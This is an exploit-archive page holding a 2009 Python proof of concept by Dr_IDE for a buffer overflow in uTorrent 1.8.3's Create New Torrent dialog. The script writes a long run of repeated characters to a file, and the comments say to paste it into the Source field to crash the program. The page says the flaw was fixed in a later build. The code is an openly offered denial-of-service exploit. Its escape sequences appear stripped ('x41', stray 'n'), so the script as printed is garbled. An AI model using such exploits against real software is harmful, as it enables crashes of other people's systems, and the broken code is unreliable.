[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : uTorrent <= 1.8.3 (Build 15772) Create New Torrent Buffer Overflow PoC
# Published : 2009-08-28
# Author : Dr_IDE
# Previous Title : TFTPUtil GUI 1.3.0 Remote Denial of Service Exploit
# Next Title : Xerox WorkCentre Multiple Models Denial of Service Exploit


#!/usr/bin/env python

#####################################################################################################
#
# uTorrent <= 1.8.3 (Build 15772) Create New Torrent Buffer Overflow PoC
# By: Dr_IDE
# Note: This is old but I figured I would release it if someone wanted to play with it.
# Note: This was fixed as of version 1.8.3 (Build 16010)
# Download: http://www.filehippo.com/download_utorrent/download/9219a21fa300a93e885069c992a8a925/
# Usage: File -> Create New Torrent -> Paste string into "Source" field -> Click "Add File"
#
#####################################################################################################


buff = ("x41" * 9000)

try:
	f1 = open("uTorrent.txt","w");
	f1.write(buff);
	f1.close();

	print "nuTorrent <= 1.8.3 (Build 15772) Create New Torrent Buffer Overflow PoC"
	print "By: Dr_IDE"
	print "nFile Created Successfully.n"
	print "Usage: n[-] Click Filen[-] Create New Torrentn[-] Paste string into "Source" fieldn[-] Click "Add File""

except:
	print "Error. File couldn't be created."

# www.Syue.com [2009-08-28]